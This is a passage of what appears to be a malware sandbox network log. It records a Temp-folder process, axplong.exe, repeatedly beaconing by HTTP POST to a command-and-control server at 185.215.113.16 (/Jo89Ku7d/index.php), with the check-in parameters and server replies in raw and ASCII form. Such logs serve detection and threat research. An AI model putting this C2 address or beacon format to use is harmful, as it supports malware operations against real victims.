                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:47.022134066 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:47.023183107 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:47.272697926 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.651119185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:47.382014036 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:48.151751995 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:48.152791977 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:48.405695915 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.651120185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:48.526061058 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:49.558984041 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:49.559909105 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:49.562638044 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:49.814817905 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.651121185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:49.929337025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:50.692059040 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:50.693114996 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:50.941869020 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.651122185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:51.053700924 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:51.823230028 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:51.824547052 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:52.074811935 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.651123185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:52.194534063 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:52.985714912 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:52.989514112 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:53.243582964 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.651124185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:53.350646019 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:54.135282993 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:54.136408091 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:54.388052940 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.651125185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:54.506972075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:55.269821882 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:55.270775080 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:55.520315886 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.651126185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:55.631990910 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:56.370784998 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:56.371906042 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:56.615612984 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.651127185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:56.725807905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:57.661175966 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:57.661989927 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:57.922636986 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.651128185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:58.041457891 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:58.842703104 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:58.843723059 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 20:59:59.092746019 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.651129185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 20:59:59.224313974 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 20:59:59.969131947 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 18:59:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 20:59:59.970283031 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:00.215368032 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
